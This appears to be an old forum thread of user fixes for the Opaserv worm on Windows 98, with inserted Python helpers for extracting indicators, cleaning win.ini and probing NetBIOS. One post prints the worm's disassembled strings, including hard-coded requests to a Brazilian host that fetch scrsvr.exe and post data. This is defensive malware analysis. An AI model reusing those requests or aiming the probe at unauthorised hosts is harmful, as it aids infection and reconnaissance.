Tom's Guide | Tom's Hardware | Tom's Games
Hi!
I found a process running called "Alevir.exe" this morning. The file (28k) is located in c:\windows. It's in "Autostart", but not in other registry entries. Did anyone else get this? What is it exactly?

It shows up as a virus on this list here:
http://www.commandsoftware.com/virus/virlistdetailed.cfm
A google search found a few similar pages to that one but not much.
Ok, TrendMicro lists it here:
http://www.trendmicro.com/vinfo/virusencyclo/default2.asp?m=q&virus=alevir&alt=alevir
TrendMicro has a free virus scan, if you don't have an AV program on your computer. You should! You can get a really good free one at www.grisoft.com called AVG.
I would download AVG if you don't have an AV already, and run it. You can also run the free scan at TrendMicro. And you can go to http://www.bitdefender.com/html/free_tools.php
for their free removal tools.
Hope this helps - good luck.

It seems to me that Alevir.exe is a replacement for brasil.pif or brasil.exe, but I am not sure. If that is the case, the file may be the remnants of the W32.Opaserv.E.Worm!
I found it in my Win.ini as:
run=alevir.exe
I simply deleted the line.

I have both alevir and brasil showing up as infections with NAV2002 on a client's computer. The program is unable to cure, and I have deleted, quarantined and ignored both files all day. I have physically disconnected it from the network. I have removed the reference from Win.ini, and created a blank file alevir.txt, renamed and read only flagged it. We'll see what happens. BTW. I've been fighting with OpaSrv since 9 October. Tried most every solution out there. Has anyone got anything new?
Cheerz.

brasil is part of the scrsvr.exe virus, I think. I did this to fix it, thanks to madh. The 3 places *ScrSVR.EXE* hides are:
1. C:\Win.ini in the [Windows] section in the Run="C:\Windows\ScrSvr.exe"
2. In C:\Windows\ScrSVR.exe
3. In HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
After you click *Run* from the above in the LEFT panel, look in the RIGHT panel for *ScrSVR* in the first column and "C:\Windows\ScrSVR.exe" in the second column.
In your removal, start with the Registry > Win.ini > Windows Explorer
1. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
Right click *ScrSVR* > Delete
2. Find *Win.ini* on the *C:* drive [as C:\Windows\Win.ini]
3. Open *Win.ini* in *Notepad* and look under [Windows] for Run="C:\Windows\ScrSvr.exe"
4. Delete "C:\Windows\ScrSvr.exe"
5. Open Windows Explorer and find "C:\Windows\ScrSvr.exe"
Right click *ScrSvr.exe* and delete.
Run a virus scan with the latest virus definitions.

You can also edit the Win.ini file by going into msconfig. That is how I rid mine of these annoying pests. I too was bugged by them for 2 days. I deleted them and they kept coming back! Then I investigated the virus I had. Now I run a program called Security 98. Don't know how good it is, but I don't have the virus any more. One tip on editing out any virus lines in Win.ini:
Be careful deleting the full command line. On my machine it attached itself to my sound card's command line. I guess this was in the hope I would leave it alone.

The virus spreads using netbios, remove file sharing from drive C.
I tried the Microsoft password patch 273991USA8.exe without any success to avoid being attacked.
A temporary fix could be to include these lines in autoexec.bat:
del c:\windows\alevir.exe
del c:\windows\brasil.exe
del c:\windows\scrsvr.exe
The two others are just old versions of the same, and they are also being transferred to our Windows machines.
Keep an eye on network traffic with a TCP/IP protocol analyser such as Winternals TCPView Pro; look out for traffic generated by kernel32.
Hopefully we will soon know more.

gram,
I was one of the lucky ones who got the full blown effect of the Opaserv worm. I've had scrsvr.exe, brasil.pif, and then alevir.exe. Norton Anti-Virus would always detect it trying to run, but it could never keep my system clean from it. I followed all of their directions, downloaded all of their tools, kept my win.ini file clean, made dummy scrsvr.exe files, etc. And the stupid things kept coming back!!! I wrote Norton email after email, telling them that their anti-virus software isn't stopping the virus from getting on my computer. I sent them brasil.pif on October 21, and then finally, on October 25, they listed it as a threat, claiming it was discovered on October 25. Stupid liars. And all the while, the virus kept coming back. Eventually, I resorted to closing my ports 137-139 (turning off NetBIOS), and my computer has not reported a virus for 3 days now. (It used to report every 15 minutes.) Before, from what I could tell, I could clean the viruses off my system using simple techniques such as removing the lines out of win.ini and my registry. I'd stay virus free until I'd connect to the internet, and then *bang* the viruses were back, sometimes in a new morphed form (brasil.pif or alevir.exe). It appears the virus uses a security flaw in Windows (I'm running Win 98), by communicating to your computer through these ports, and by turning off ports 137-139, you fix it.
I found a nice site that describes how to turn off these ports in detail, and it has simple to follow steps with handy screenshots. The site is here.
https://grc.com/x/ne.dll?bh0bkyd2
Run the "Probe my Ports" test first for kicks; it should show you that your computer is vulnerable on the ports that this virus uses. Next, go to section 5, "Network bondage". That will describe how to turn off these ports. By the way, this shouldn't affect your computer's network connections at all. It just redistributes network communication in the proper way, and you simply close off ports 137-139 to those that shouldn't have access to them.
Good luck!

Hi,
I also detected Alevir.exe, Brasil.pif and scrsvr.exe on my Windows 98.
I deleted the files and removed it from the anywhere I found it.
(win.ini, autostart-entries, system.ini, Registry)
I also found a little text-file named put.ini with a command-line to run the 3 files above, I deleted this file.
Windows didn't want to delete alevir.exe, so I removed it from Linux.
Everything seems to be clear now; I wonder which application installed this worm.
I guess it must have been the Kazaa-Music-s---, and now I have deactivated Kazaa: I simply renamed the directory and removed every startup entry from the Windows files.
Robert

Along with the great advice above, I strongly advise getting a firewall like Zone Alarm. Just using the FREE ZA (not ZA Plus or ZA Pro), I got these responses on grc.com:
Test My Shields!
"Your Internet port 139 does not appear to exist! One or more ports on this system are operating in FULL STEALTH MODE! Standard Internet behavior requires port connection attempts to be answered with a success or refusal response. Therefore, only an attempt to connect to a nonexistent computer results in no response of either kind. But YOUR computer has DELIBERATELY CHOSEN NOT TO RESPOND (that's very cool!) which represents advanced computer and port stealthing capabilities. A machine configured in this fashion is well hardened to Internet NetBIOS attack and intrusion.
Unable to connect with NetBIOS to your computer. All attempts to get any information from your computer have FAILED. (This is very uncommon for a Windows networking-based PC.) Relative to vulnerabilities from Windows networking, this computer appears to be VERY SECURE since it is NOT exposing ANY of its internal NetBIOS networking protocol over the Internet."
Probe My Ports! got this response on ALL 13 tries:
"There is NO EVIDENCE WHATSOEVER that a port (or even any computer) exists at this IP address!"
For a completely free program, I'm pretty happy so far. Oh, and I'm blocking brasil, alevir and scrsvr perfectly now, but they are still on my computer. I'll get rid of them soon. Thanks for all the info here.

As we are seeing, a network device is indicating data out. Disassembled code from that Alevir.exe is below, which shows some hard-coded bytes, i.e. [ db 'Host: www.n3t.com.br.',0Dh,0Ah ]. But there may be something new to us: it first registers itself (alevir.exe) as a service process, and downloads scrsvr.exe later on... what else? Who knows, and who wants to know?
================================================================
segment para public 'DATA' use32
assume cs:DATA
;org 405000h
dd 7 ; DATA XREF: sub_4019AF+339r
db 0 ; DATA XREF: start+2AAr
; sub_4019AF+3A3w
db 'Alevir31415',0 ; DATA XREF: start+Bo
db 'KERNEL32.dll',0 ; DATA XREF: start+29o
db 'RegisterServiceProcess',0 ; DATA XREF: start+33o
db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_4014A5+Eo
db 'Software\Microsoft\Windows\CurrentVersion\Internet Settings',0
; DATA XREF: sub_4019AF+2Fo
db 'Alevir',0 ; DATA XREF: sub_4014A5+4Ao
; sub_4014A5+C5o ...
db 'AlevirOld',0 ; DATA XREF: sub_4014A5+3Do
; sub_4014A5+79o ...
db 'ProxyEnable',0 ; DATA XREF: sub_4019AF+5Co
db 'ProxyServer',0 ; DATA XREF: sub_4019AF+89o
db '\Alevir.exe',0 ; DATA XREF: sub_4014A5+110o
db 'Alevir.dat',0 ; DATA XREF: start+108o
; start+18Eo ...
db 'AleSout.dat',0 ; DATA XREF: start+144o
; start+269o ...
db 'puta!!.exe',0 ; DATA XREF: sub_4014A5+57o
; sub_4019AF+37Co
db 'www.n3t.com.br.',0 ; DATA XREF: sub_4019AF+E5o
db 'GET http://www.n3t.com.br/work/sscheduler.php?ver=01&task=newzad&first='
; DATA XREF: sub_4019AF+23Ao
db 30h ; DATA XREF: sub_4019AF+228w
; sub_4019AF+2B3w
db ' HTTP/1.1',0Dh,0Ah
db 'Host: www.n3t.com.br.',0Dh,0Ah
db 0Dh,0Ah,0
db 'GET http://www.n3.com.br/wwwork/lastver HTTP/1.1',0Dh,0Ah
; DATA XREF: sub_4019AF+318o
db 'Host: www.n3t.com.br.',0Dh,0Ah
db 0Dh,0Ah,0
db 'GET http://www.n3t.com.br/wwork/scrsvr.exe HTTP/1.1',0Dh,0Ah
; DATA XREF: sub_4019AF+34Co
db 'Host: www.opasoft.com',0Dh,0Ah
db 0Dh,0Ah,0
db 'POST http://www.n3t.com.br/wwork/scheduler.php?ver=01&plain='
; DATA XREF: sub_4019AF+19Fo
db '0123456789ABCDEF&cipher1=0123456789ABCDEF&cmpmask=FFFFFFFFFF'
; DATA XREF: sub_4019AF+15Bo
db 'FFFFFF&key=123456&res=0 HTTP/1.1',0Dh,0Ah
db 'Host: www.n3t.com.br.',0Dh,0Ah
db 0Dh,0Ah,0
db ' OK',0 ; DATA XREF: sub_4019AF+1B8o
db 'PLAIN',0 ; DATA XREF: sub_4019AF+25Eo
db 'CIPHER1',0 ; DATA XREF: sub_4019AF+278o
db 'KEY',0 ; DATA XREF: sub_4019AF+28Eo
db 3 dup(0FEh), 0Eh, 5 dup(0) ; DATA XREF: start+220o
db 4 ; ; DATA XREF: sub_4022A1+198o
db 'WINDOWS\alevir.exe',0
db 4 ; ; DATA XREF: sub_4022A1+1FDo
; sub_4022A1+3EDo
db 'WINDOWS\win.ini',0
db 'c:\put.ini',0 ; DATA XREF: sub_4022A1+245o
; sub_4022A1+36Ao ...
db 'c:\windows\alevir.exe',0 ; DATA XREF: sub_4022A1+38Eo
; sub_4022A1+3B7o
db ',',0 ; DATA XREF: sub_4022A1+3A6o
db 'windows',0 ; DATA XREF: sub_4022A1+37Co
; sub_4022A1+3D3o
db 'run',0 ; DATA XREF: sub_4022A1+377o
; sub_4022A1+3CEo
db 2 dup(0), 21h, 0, 1
db 'LOCALHOST X' ; DATA XREF: sub_4022A1+57o
db 0FBh, 7Fh, 77h, 4Fh, 2 dup(0F9h), 0E3h, 3Fh, 0, 3, 5 dup(0)
db 8 dup(0FFh), 0DFh, 0FDh, 0FFh, 3Fh, 1, 4 dup(0)
================================================================
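What a practitioner does with a listing like the one above is pull out the indicators: the hosts contacted, the request URLs, the file names dropped and the registry key used for persistence. The following is an added Python example, not part of the post above, that re-assembles the bytes the db directives describe (quoted strings, hex values, dup(...) repeats) and then extracts those indicators with a strings-style scan. The LISTING excerpt is a constructed subset of the dump above with the cross-reference comments trimmed; the extraction regexes are this example's own choices, not anything from the worm or the poster.

```python
import re
from urllib.parse import urlsplit

# Constructed excerpt of the IDA data listing posted above (comments trimmed).
LISTING = r"""
db 'Alevir31415',0 ; DATA XREF: start+Bo
db 'KERNEL32.dll',0 ; DATA XREF: start+29o
db 'RegisterServiceProcess',0
db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
db 'puta!!.exe',0
db 'www.n3t.com.br.',0
db 'GET http://www.n3t.com.br/work/sscheduler.php?ver=01&task=newzad&first='
db 30h ; DATA XREF: sub_4019AF+228w
db ' HTTP/1.1',0Dh,0Ah
db 'Host: www.n3t.com.br.',0Dh,0Ah
db 0Dh,0Ah,0
db 'GET http://www.n3.com.br/wwwork/lastver HTTP/1.1',0Dh,0Ah
db 'Host: www.n3t.com.br.',0Dh,0Ah
db 0Dh,0Ah,0
db 'GET http://www.n3t.com.br/wwork/scrsvr.exe HTTP/1.1',0Dh,0Ah
db 'Host: www.opasoft.com',0Dh,0Ah
db 0Dh,0Ah,0
db 3 dup(0FEh), 0Eh, 5 dup(0)
db 4
db 'WINDOWS\alevir.exe',0
db 'c:\put.ini',0
"""

# One token per operand: 'string' | n dup(value) | hex value with h suffix | decimal
TOKEN = re.compile(r"'([^']*)'|(\d+)\s+dup\(([0-9A-Fa-f]+h?)\)|([0-9A-Fa-f]+h)|(\d+)")
DIRECTIVE = re.compile(r"^(db|dw|dd)\s+(.*)$", re.IGNORECASE)
WIDTH = {"db": 1, "dw": 2, "dd": 4}


def strip_comment(line: str) -> str:
    """Cut at the first ';' that is not inside a quoted string."""
    in_quote = False
    for i, ch in enumerate(line):
        if ch == "'":
            in_quote = not in_quote
        elif ch == ";" and not in_quote:
            return line[:i]
    return line


def number(tok: str) -> int:
    return int(tok[:-1], 16) if tok.lower().endswith("h") else int(tok, 10)


def listing_to_bytes(listing: str) -> bytes:
    """Re-emit the bytes that the data directives describe, in listing order."""
    data = bytearray()
    for raw in listing.splitlines():
        m = DIRECTIVE.match(strip_comment(raw).strip())
        if not m:
            continue
        width = WIDTH[m.group(1).lower()]
        for t in TOKEN.finditer(m.group(2)):
            if t.group(1) is not None:                       # quoted string, one byte per char
                data += t.group(1).encode("latin-1")
            elif t.group(2):                                 # n dup(value)
                data += number(t.group(3)).to_bytes(width, "little") * int(t.group(2))
            else:                                            # single hex or decimal value
                data += number(t.group(4) or t.group(5)).to_bytes(width, "little")
    return bytes(data)


# strings(1)-style scan: runs of 4+ printable bytes (CR/LF/TAB allowed so an HTTP request stays whole)
STRING_RUN = re.compile(rb"[\x20-\x7e\t\r\n]{4,}")
URL = re.compile(r"https?://[^\s'\"<>]+")
HOST_HEADER = re.compile(r"^Host:\s*(\S+)", re.IGNORECASE | re.MULTILINE)
FILE_NAME = re.compile(r"[\w!$:\\.-]+\.(?:exe|pif|scr|ini|dat|dll)\b", re.IGNORECASE)
REG_KEY = re.compile(r"software\\[\w\\ ]+", re.IGNORECASE)


def printable_strings(data: bytes):
    return [m.group().decode("ascii") for m in STRING_RUN.finditer(data)]


def extract_iocs(strings):
    """Hosts, URLs, dropped file names and registry keys found in the strings."""
    hosts, urls, files, keys = set(), set(), set(), set()
    for s in strings:
        for u in URL.findall(s):
            urls.add(u)
            hosts.add(urlsplit(u).hostname.rstrip("."))
        for h in HOST_HEADER.findall(s):
            hosts.add(h.lower().rstrip("."))                 # 'www.n3t.com.br.' -> 'www.n3t.com.br'
        for f in FILE_NAME.findall(s):
            files.add(f.split("\\")[-1].lower())             # keep the base name only
        keys.update(REG_KEY.findall(s))
    return {"hosts": hosts, "urls": urls, "files": files, "registry": keys}


if __name__ == "__main__":
    iocs = extract_iocs(printable_strings(listing_to_bytes(LISTING)))
    for kind in ("hosts", "urls", "files", "registry"):
        print(kind, sorted(iocs[kind]))
```

The run over the excerpt gives three distinct hosts (www.n3t.com.br, www.n3.com.br and www.opasoft.com), which is the kind of detail a block list or firewall log search needs and which is easy to miss reading the dump by eye.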

I had it.
Hard to get rid of.
The solution may be to open Windows in safe mode,
locate the file alevir.exe in Windows
and simply delete it.
For all that, remove printer sharing.
Go to the site secuser.com.
I hope you will understand my French!
Good luck

In autoexec.bat, type these in the first lines:
del c:\windows\alevir.exe
del c:\windows\brasil.exe
del c:\windows\scrsvr.exe
del c:\put.ini
Also delete the bulls--- in win.ini.
It seems this s--- was created in Sao Paulo (Brazil)... so if you're bored, run edit and see what our worm looks like. It shows: sao paulo, alevirus, opasoft --> what is opasoft? Like Microsoft?? Is it a Brazilian version? haha
And if you're still bored:
what is www.n3.com.br or www.opasoft.com
or www.n3t.com --> all included!! in our worms

The way I did it was this.
1. Open regedit and do a search for "alevir", "brasil" and "scrsvr" and delete any references to them.
2. Edit win.ini and remove any reference to them.
3. Reboot to DOS and delete any of these files that you find in the windows directory: ALEVIR.exe BRASIL.* SCRSVR.*
4. Create fake files called ALEVIR.EXE, BRASIL.EXE, BRASIL.PIF & SCRSVR.exe and mark them all as read-only.
5. That should do it. If not, My next step would be to make copies of the fake files in another directory and just copy them back into the windows directory on every boot via autoexec so that if they ever do return, they are automatically written over with the fake files.

Got rid of alevir.exe by:
Rebooting, hitting F8 and going into "Safe & Command Prompt" mode.
Went from C:\ to C:\WINDOWS
Then deleted by :
C:\WINDOWS> del alevir.exe
and hit return (normal DOS delete).
It DOESN'T SHOW any files deleted, but when you reboot, it's gone.
So, then, reboot.
Then go to Start, Find, and delete the associated alevir file in APPLOG
Clean WIN.INI of any references to alevir.
N. Smith
------------
PS: McAfee Firewall will show you if it is really gone, as it is continuously trying to 'get out' if you are on line.

Anyone know if cmmpu.exe is a part of this? When I went to clean up win.ini, I saw this line: "Run=C:\WINDOWS\SYSTEM\cmmpu.exe,c:\windows\scrsvr.exe,c:\windows\Brasil.pif,c:\windows\Brasil.exe,c:\windows\alevir.exe"
Is cmmpu a part of it, or was the other stuff just added to an already existing line, one I shouldn't delete?
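The earlier tip about not deleting the whole run= line (the sound card entry that the worm attached itself to) and the cmmpu.exe question above come down to the same operation: strip the known worm names from the [windows] run= and load= values and leave every other entry alone for the owner to judge. Below is an added Python example that does this; it is not from the thread and does not settle what cmmpu.exe is. The WORM_NAMES list is compiled from the file names posted in this thread, and the sample win.ini is constructed from the line quoted in the cmmpu.exe post.

```python
import re
from pathlib import PureWindowsPath

# File names the Opaserv variants in this thread drop (compiled from the posts above).
WORM_NAMES = {"alevir.exe", "brasil.exe", "brasil.pif", "scrsvr.exe", "marco!.scr", "put.ini"}

# Constructed sample modelled on the run= line quoted in the cmmpu.exe post.
SAMPLE_WIN_INI = r"""[windows]
load=
run=C:\WINDOWS\SYSTEM\cmmpu.exe,c:\windows\scrsvr.exe,c:\windows\Brasil.pif,c:\windows\Brasil.exe,c:\windows\alevir.exe
NullPort=None

[Desktop]
Wallpaper=(None)
"""


def basename(entry: str) -> str:
    """Lower-cased file name of one run=/load= entry, surrounding quotes stripped."""
    return PureWindowsPath(entry.strip().strip('"')).name.lower()


def clean_run_value(value: str):
    """Drop known worm entries from a run=/load= value; keep everything else.

    Windows 9x accepts both commas and spaces as separators here, so an entry
    containing a space (a long file name) would be split. 9x-era win.ini lines
    normally carry 8.3 paths, which is the assumption made in this example.
    """
    sep = "," if "," in value else " "
    entries = [e for e in re.split(r"[,\s]+", value.strip()) if e]
    kept, removed = [], []
    for entry in entries:
        (removed if basename(entry) in WORM_NAMES else kept).append(entry)
    return sep.join(kept), removed


def clean_win_ini(text: str):
    """Return (cleaned text, removed entries).

    Only run= and load= under [windows] are touched, because those are the
    keys Windows executes at logon; every other line is copied through as-is.
    """
    out, removed = [], []
    in_windows = False
    key = re.compile(r"^(\s*)(run|load)(\s*=\s*)(.*)$", re.IGNORECASE)
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.startswith("[") and stripped.endswith("]"):
            in_windows = stripped.lower() == "[windows]"
        elif in_windows:
            m = key.match(line)
            if m:
                new_value, dropped = clean_run_value(m.group(4))
                removed.extend(dropped)
                line = f"{m.group(1)}{m.group(2)}{m.group(3)}{new_value}"
        out.append(line)
    return "\n".join(out) + "\n", removed


if __name__ == "__main__":
    cleaned, dropped = clean_win_ini(SAMPLE_WIN_INI)
    for entry in dropped:
        print("removed:", entry)
    print(cleaned)
```

On the sample the four worm paths are removed and the line is rewritten as run=C:\WINDOWS\SYSTEM\cmmpu.exe; an entry that is not on the list stays, so a legitimate program (or an unknown one that deserves a separate look) is never dropped by accident. The same function handles the quoted form Run="C:\Windows\ScrSvr.exe" from the earlier post.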

I had to employ both matias loyola's and matt huff's ideas to fix this for me.
I added:
del c:\windows\alevir.exe
del c:\windows\brasil.exe
del c:\windows\scrsvr.exe
del c:\put.ini
to the beginning of autoexec.bat, then rebooted.
Once the files were gone, I created the fake files by changing text files to .exe's, then put them where the other ones should be, and made them read-only.
This solved my problem perfectly, and put an end to my 6 hour struggle.
Thank you for all your help guys :)

Found the file
MACRO!.SCR
may have been the source file that becomes ALEVIR.EXE, BRASIL.EXE, BRASIL.SCR and SCRSVR.exe. Since deleting this file from my computer booted in DOS mode, I have not received an infection notice from Norton Antivirus.
Hope this helps.
Thanks

Well, I have finally broken the virus down. All you have to do is update the definitions of NAV2002 and download fixopsvr 1.02 (newly released on October 24). You can find this by searching for w32.opaserv.e.worm on google.com. Then follow the instructions given by Symantec. Download all the updates they tell you to, then create text files
c:\alevir.exe
c:\brasil.pif
c:\brasil.exe
c:\scrsvr.exe
and there is the solution for your problem guys

Hey, I had the same problem as you all.
What I have done is the same as you all did,
but it still returns. I spotted the IP address of this virus; disable the external IP address 62.59.79.73 in your firewall.
Greets, Ruud
www.autobedrijfkeizer.nl

To prevent infection, do all the parts explained on www.sarc.com, first with the tools and second by hand. You must find marco!.scr and delete it. Most important: in the TCP/IP binding for the modem, remove the flag for shared files.

This is not very smart, but useful, especially for non-specialists like me...
Had the same problems with OpaSoft. Removed it every now and then. Finally I made "my own" scrsvr file! I simply wrote a small text file, renamed it to scrsvr.exe and set the write-protection flag.
The source is still somewhere on my disk, because at that very moment, when I delete my own Scrsvr-File, the bad one shows up. But at the moment, it works!
Now I try the same with alevir.exe and brasil.pif /.exe
Cheers
Wolfgang

Hi, I have had all of the viruses listed above and was wondering if anyone ever tried making your WIN.INI read-only? Just a thought; you would probably need to disable it when installing new hard/soft-ware.
ps this forum has been a great wealth of info in this matter KUDOS to contributors and mods!!!!!

I tried everything to kill the germ:
Norton, FixOp, manual delete...
but it still kept coming back. Finally I found the solution:
BitDefender firewall. THE CURE!!!!!
I got it on:
www.telecharger.com
----- antivirus
You must find it on
www.download.com

1. Make sure that your shared drives are hidden. How, you ask? When creating the share, name the share C$ instead of C.
2. Right click on Network Neighbourhood. Modify the properties of TCP/IP for the Dial-Up Adapter. Ignore the caveat and ensure that "File and Print sharing" is UNTICKED in "Bindings" and save.
3. Delete any reference to the filenames in the registry and in "WIN.INI".
Hope this works!
Good luck.

Hi, I just found SCRSVR.exe on my PC and I did it this way.
(I'm using ME, but I think it should even work on the other versions.) First of all I started in Safe Mode (sorry, I don't know how it sounds in the English version! German: "Abgesicherter Modus").
Then I deleted
alevir.exe
brasil.pif
brasil.exe
scrsvr.exe
and marco.exe (it appeared suddenly; before, I never saw it).
That's all! Since then it hasn't appeared again!

We are using Sygate Personal Firewall (www.sygate.com, free download), which in the traffic logs reports kernel32 trying to connect to 224.0.0.2. If this succeeds we then get incoming data, followed by Norton picking up the virus file. We have disabled the firewall after disabling IRDP/DHCP (www.homstead.com/tweakup/tweakup.html download) and are waiting to see if the virus returns. (Four hours on and still no virus.) This really convinces us that this is the cause of the reinfection. Check your firewall logs for the above IP.

Because nobody's linked this post to all the other opaserv threads on this site, I'll go ahead and copy an article I've put on all of the others. Here it is again:
I was one of the lucky ones who got the full blown effect of the Opaserv worm. I had scrsvr.exe, brasil.pif, alevir.exe, and then marco!.scr. Norton Anti-Virus would always detect it trying to run, but it could never keep my system clean from it. I followed all of their directions, downloaded all of their tools, downloaded the patch from Microsoft, cleaned out my registry, kept my win.ini file clean, made dummy scrsvr.exe and brasil.pif files with the +r read attribute flag, etc. And the stupid things kept coming back!!! I wrote Norton email after email, telling them that their anti-virus software isn't stopping the virus from getting on my computer. I sent them brasil.pif on October 21, and then finally, on October 25, they listed it as a threat, claiming it was discovered on October 25. Stupid liars. And all the while, the virus kept coming back. Because of all of this, I feel that I have to resort to caps to make the following point =)
IF YOU SIMPLY USE NORTON ANTIVIRUS AND DELETE CERTAIN FILES AND REGISTRY ENTRIES THE VIRUS CREATES, THE WORM WILL COME BACK! THE VIRUS USES PORTS 137-139 ON YOUR COMPUTER TO WORK. YOU MUST CLOSE THOSE PORTS!
So, I resorted to closing my ports 137-139 (Turning off NetBIOS), and my computer has not reported a virus for 6 days now. (It used to report it every 15 minutes.) Before, from what I could tell, I could clean the viruses off my system using simple techniques such as removing the lines out of win.ini and my registry. I'd stay virus free until I'd connect to the internet, and then *bang* the viruses were back, sometimes in a new morphed form (brasil.pif or alevir.exe). It appears the virus uses a security flaw in Windows (I'm running win 98), by communicating to your computer through these ports, and by turning off ports 137-139, you fix it.
I found a nice site that describes how to turn off these ports in detail, and it has simple to follow steps with handy screenshots. The site is here.
https://grc.com/x/ne.dll?bh0bkyd2
Run the "Probe my Ports" test first for kicks; it should show you that your computer is vulnerable on the ports that this virus uses. Next, go to section 5, "Network bondage". That will describe how to turn off these ports. By the way, this shouldn't affect your computer's network connections at all. It just redistributes network communication in the proper way, and you simply close off ports 137-139 to those that shouldn't have access to them. Once you do this, the virus should be blocked from coming back every time you connect to the internet.
By the way, make sure you also follow all of the tips listed on Symantec about the Opaserv worm. You must clean out your registry, win.ini file, and download the patch from Microsoft.
If all of this was too technical for you, then another great solution is to download the free version of ZoneAlarm here:
http://download.com.com/3000-2092-10153456.html?tag=lst-0-8
Another quick and easy solution is to just disable file and printer sharing. I've heard from others that did the trick (As for me and most others, I need file and printer sharing)
And as for one last side note, it appears that you can't fully remove the virus, you can only suppress it. For example, my ports 137-139 were closed, and I hadn't had a virus report in 7 days as a result. I scanned for the opaserv virus using both of Norton's tools (NAV and FixOpsv.com), and it reported I was virus free. Then I decided to open the ports and connect to the internet to see what happened. *BAM* The virus was back in 5 minutes! And I was on a dialup dynamic IP address! That means the virus waits on the computer, just waiting for open ports and an internet connection. So I closed the ports, and immediately all virus activity stopped again. To sum up, by closing the ports off, you'll just suppress the virus for the rest of your computer's life.
Good luck!
Brad Peterson
b_peterson@yahoo.com
(email me if you have problems, I'd be happy to help)
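Both posts that close ports 137-139 (the reply addressed to gram near the top of the thread, and this one) rely on an outside probe such as GRC's to tell whether the machine still answers NetBIOS. Added here as an example that is not from the thread, GRC or Symantec: the NetBIOS node status query such a probe sends to UDP 137 (the same request nbtstat -A makes), a parser for the reply, and a check for the unique <20> name that the Server service (file and print sharing) registers. The sample reply is constructed for a hypothetical host WORKSTN in WORKGROUP with a made-up MAC address; probe() sends the real query if you point it at a host you are allowed to test.

```python
import socket
import struct

NBNS_PORT = 137
QTYPE_NBSTAT = 0x0021     # node status request, what "nbtstat -A" sends
QCLASS_IN = 0x0001
NODE_TYPES = {0: "B", 1: "P", 2: "M", 3: "H"}


def encode_nb_name(name: str, suffix: int = 0x00, pad: bytes = b" ") -> bytes:
    """RFC 1001/1002 first-level encoding: each nibble of the 16-byte name
    (15 characters plus the suffix byte) becomes one letter A..P, 32 in all."""
    raw = name.encode("ascii")[:15].ljust(15, pad) + bytes([suffix])
    return b"".join(bytes([0x41 + (b >> 4), 0x41 + (b & 0x0F)]) for b in raw)


def build_nbstat_query(tid: int) -> bytes:
    """Wildcard ('*' padded with NULs) node status query, 50 bytes on the wire."""
    header = struct.pack(">HHHHHH", tid, 0x0000, 1, 0, 0, 0)   # QDCOUNT=1
    qname = b"\x20" + encode_nb_name("*", pad=b"\x00") + b"\x00"
    return header + qname + struct.pack(">HH", QTYPE_NBSTAT, QCLASS_IN)


def parse_nbstat_response(data: bytes) -> dict:
    """Decode the name table and MAC address from a node status response."""
    tid, flags, _qd, an, _ns, _ar = struct.unpack(">HHHHHH", data[:12])
    if not flags & 0x8000 or an < 1:
        raise ValueError("not an NBNS response carrying an answer")
    pos = 12
    while data[pos] != 0:                 # skip the length-prefixed RR name
        pos += 1 + data[pos]
    pos += 1
    rtype, _rclass, _ttl, rdlen = struct.unpack(">HHIH", data[pos:pos + 10])
    pos += 10
    if rtype != QTYPE_NBSTAT:
        raise ValueError(f"unexpected RR type {rtype:#x}")
    rdata = data[pos:pos + rdlen]
    names, off = [], 1
    for _ in range(rdata[0]):             # NUM_NAMES entries of 18 bytes each
        entry = rdata[off:off + 18]
        off += 18
        nflags = struct.unpack(">H", entry[16:18])[0]
        names.append({
            "name": entry[:15].rstrip(b" \x00").decode("latin-1"),
            "suffix": entry[15],
            "group": bool(nflags & 0x8000),            # G bit
            "node_type": NODE_TYPES[(nflags >> 13) & 0x3],
            "active": bool(nflags & 0x0400),           # ACT bit
        })
    mac = ":".join(f"{b:02x}" for b in rdata[off:off + 6])
    return {"tid": tid, "names": names, "mac": mac}


def has_file_server(parsed: dict) -> bool:
    """A unique <20> name means the Server service is registered, i.e. the
    host is offering shares over NetBIOS, which is what the worm looks for."""
    return any(n["suffix"] == 0x20 and not n["group"] for n in parsed["names"])


def probe(host: str, timeout: float = 2.0):
    """Send the query to a real host. None means no answer (the 'stealth'
    result in the GRC output above); otherwise the parsed name table."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_nbstat_query(0x1234), (host, NBNS_PORT))
        try:
            data, _ = s.recvfrom(4096)
        except socket.timeout:
            return None
    return parse_nbstat_response(data)


def _sample_response() -> bytes:
    """Constructed reply from a hypothetical Windows 9x box WORKSTN in WORKGROUP."""
    table = [("WORKSTN", 0x00, 0x0400), ("WORKGROUP", 0x00, 0x8400),
             ("WORKSTN", 0x20, 0x0400)]
    entries = b"".join(n.encode().ljust(15, b" ") + bytes([sfx]) + struct.pack(">H", f)
                       for n, sfx, f in table)
    rdata = bytes([len(table)]) + entries + bytes.fromhex("001122334455") + b"\x00" * 40
    header = struct.pack(">HHHHHH", 0x1234, 0x8400, 0, 1, 0, 0)   # response + AA, ANCOUNT=1
    rr_name = b"\x20" + encode_nb_name("*", pad=b"\x00") + b"\x00"
    rr = struct.pack(">HHIH", QTYPE_NBSTAT, QCLASS_IN, 0, len(rdata))
    return header + rr_name + rr + rdata


SAMPLE_RESPONSE = _sample_response()

if __name__ == "__main__":
    parsed = parse_nbstat_response(SAMPLE_RESPONSE)
    for n in parsed["names"]:
        kind = "GROUP" if n["group"] else "UNIQUE"
        print(f"{n['name']:<15} <{n['suffix']:02x}> {kind} {n['node_type']}-node")
    print("MAC", parsed["mac"], "file server registered:", has_file_server(parsed))
```

If probe() returns None after the NetBIOS bindings are removed, the host is no longer answering on 137, which is the state both posts above are aiming for; if it still returns a table with a unique <20> entry, the Server service is still reachable and the share-based reinfection path described in the thread is still open.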

Just an update to the previous post. We've figured out all there is to know about Opaserv. You can find it here.
This post contains the full fix for the Opaserv worm. It explains in detail how it works, and 3 methods you can use to stop it.
http://www.computing.net/security/wwwboard/forum/3289.html
Brad Peterson
b_peterson@yahoo.com
Feel free to email me if you need any help removing this virus.

